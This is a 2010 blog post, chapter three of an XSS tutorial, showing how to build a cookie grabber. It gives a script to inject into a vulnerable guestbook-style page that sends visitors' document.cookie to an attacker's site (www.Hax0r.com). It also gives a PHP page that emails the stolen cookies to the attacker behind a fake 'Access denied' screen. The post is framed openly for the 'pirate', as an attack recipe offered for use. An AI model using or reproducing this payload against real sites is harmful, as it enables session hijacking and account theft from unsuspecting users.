Tuesday, November 23, 2010

Home / Xss Complete Tutorial / ========Chapter 3 - Make a cookie grabbers=======

========Chapter 3 - Make a cookie grabbers=======

on in
insert this script in a vulnerable page (for exemple a guestbook)

<script>
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>


(www.Hax0r.com = your site)
Open notepad and make a page: cookie.php
copy/past this code:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<? mail('email@example.com', 'Cookie stealed ! - thx xyli :)', $cookies); ?> 
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>


It is not enough any more but for the pirate,
than to await the reception of the email and to read the cookie there.
Author Image

About SUMIT OJHA
Soratemplates is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design. The main mission of templatesyard is to provide the best quality blogger templates.

You May Also Like:
at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)